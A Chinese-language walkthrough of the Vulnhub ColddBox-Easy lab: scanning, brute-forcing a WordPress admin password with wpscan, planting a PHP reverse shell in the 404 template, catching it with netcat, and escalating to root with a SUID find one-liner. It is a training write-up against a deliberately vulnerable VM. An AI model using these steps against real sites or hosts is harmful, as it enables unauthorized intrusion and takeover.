Colddbox
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ sudo netdiscover -i eth
Currently scanning: 172.16.52.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:eb:28:19 2 120 PCS Systemtechnik GmbH
192.168.56.120 08:00:27:e9:39:0d 1 60 PCS Systemtechnik GmbH 1
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.120
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.120 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 00:34 EST
Nmap scan report for localhost (192.168.56.120)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-title: ColddBox | One more machine
|_http-server-header: Apache/2.4.18 (Ubuntu)
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
MAC Address: 08:00:27:E9:39:0D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
目标主机有两个开放端口80(HTTP)、4512(SSH)
Get Access
目标运行wordpress站点
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ curl http://192.168.56.120/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.120 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ gobuster dir -u http://192.168.56.120 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.120
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/16 00:45:20 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 321] [--> http://192.168.56.120/wp-content/]
/wp-includes (Status: 301) [Size: 322] [--> http://192.168.56.120/wp-includes/]
/wp-admin (Status: 301) [Size: 319] [--> http://192.168.56.120/wp-admin/]
/hidden (Status: 301) [Size: 317] [--> http://192.168.56.120/hidden/]
/server-status (Status: 403) [Size: 279]
Progress: 218127 / 220561 (98.90%)===============================================================
2022/11/16 00:45:56 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ curl http://192.168.56.120/hidden/
<!DOCTYPE html>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=UTF-8″ />
<title>Hidden Place</title>
</head>
<body>
<div align="center">
<h1>U-R-G-E-N-T</h1>
<h2>C0ldd, you changed Hugo's password, when you can send it to him so he can continue uploading his articles. Philip</h2>
</div>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ wpscan --url http://192.168.56.120 -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.120/ [192.168.56.120]
[+] Started: Wed Nov 16 00:48:03 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.120/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.120/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.120/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.120/?feed=rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
| - http://192.168.56.120/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.1.31</generator>
[+] WordPress theme in use: twentyfifteen
| Location: http://192.168.56.120/wp-content/themes/twentyfifteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.56.120/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.3
| Style URL: http://192.168.56.120/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.120/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=============================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 4 user/s
[SUCCESS] - c0ldd / 9876543210
^Cying the cold in person / handsome Time: 00:01:42 < > (5196 / 57378791) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (5200 / 57378791) 0.00% ETA: ??:??:??
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Nov 16 00:50:01 2022
[+] Requests Done: 5361
[+] Cached Requests: 48
[+] Data Sent: 1.81 MB
[+] Data Received: 19.083 MB
[+] Memory used: 266.105 MB
[+] Elapsed time: 00:01:58
Scan Aborted: Canceled by User
扫描出来用户名,并破解出用户名c0ldd的密码,用该用户名登录wordpress后台,登录后台以后知道恰好该用户是管理员,接下来就是设法将php shell脚本上传至wordpress后台。
Appearnce-》Editor-》404 Template,将php shell脚本替换代码。成功更新,现在需要知道shell.php放在什么位置?
查看首页源代码,可以推测shell.php(即404)放在:
http://192.168.56.120/wp-content/themes/twentyfifteen/404.php
Kali Linux成功得到反弹的shell
┌──(kali㉿kali)-[~/Vulnhub/Colddbox]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.120] 53248
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
07:02:19 up 52 min, 0 users, load average: 0.00, 0.14, 0.31
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ColddBox-Easy:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
c0ldd:x:1000:1000:c0ldd,,,:/home/c0ldd:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
www-data@ColddBox-Easy:/$ cd /home
cd /home
www-data@ColddBox-Easy:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Sep 24 2020 .
drwxr-xr-x 23 root root 4.0K Sep 24 2020 ..
drwxr-xr-x 3 c0ldd c0ldd 4.0K Oct 19 2020 c0ldd
www-data@ColddBox-Easy:/home$ cd c0ldd
cd c0ldd
www-data@ColddBox-Easy:/home/c0ldd$ ls -alh
ls -alh
total 24K
drwxr-xr-x 3 c0ldd c0ldd 4.0K Oct 19 2020 .
drwxr-xr-x 3 root root 4.0K Sep 24 2020 ..
-rw------- 1 c0ldd c0ldd 0 Oct 19 2020 .bash_history
-rw-r--r-- 1 c0ldd c0ldd 220 Sep 24 2020 .bash_logout
-rw-r--r-- 1 c0ldd c0ldd 0 Oct 14 2020 .bashrc
drwx------ 2 c0ldd c0ldd 4.0K Sep 24 2020 .cache
-rw-r--r-- 1 c0ldd c0ldd 655 Sep 24 2020 .profile
-rw-r--r-- 1 c0ldd c0ldd 0 Sep 24 2020 .sudo_as_admin_successful
-rw-rw---- 1 c0ldd c0ldd 53 Sep 24 2020 user.txt
www-data@ColddBox-Easy:/home/c0ldd$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ColddBox-Easy:/home/c0ldd$
提权
www-data@ColddBox-Easy:/home/c0ldd$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/bin/su
/bin/ping6
/bin/ping
/bin/fusermount
/bin/umount
/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/find
/usr/bin/sudo
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@ColddBox-Easy:/home/c0ldd$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Sep 24 2020 .
drwxr-xr-x 23 root root 4.0K Sep 24 2020 ..
-rw------- 1 root root 10 Oct 19 2020 .bash_history
-rw-r--r-- 1 root root 0 Oct 14 2020 .bashrc
drwx------ 2 root root 4.0K Sep 24 2020 .cache
-rw------- 1 root root 220 Sep 24 2020 .mysql_history
drwxr-xr-x 2 root root 4.0K Sep 24 2020 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 49 Sep 24 2020 root.txt
# cat root.txt
cat root.txt
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
#
利用GTFOBINS提供的信息,基于find命令的SUID位进行提权,成功拿到root flag!!!
标签:bin,http,ColddboxEasy,192.168,c0ldd,Vulnhub,靶机,root,usr From: https://www.cnblogs.com/jason-huawen/p/16895722.html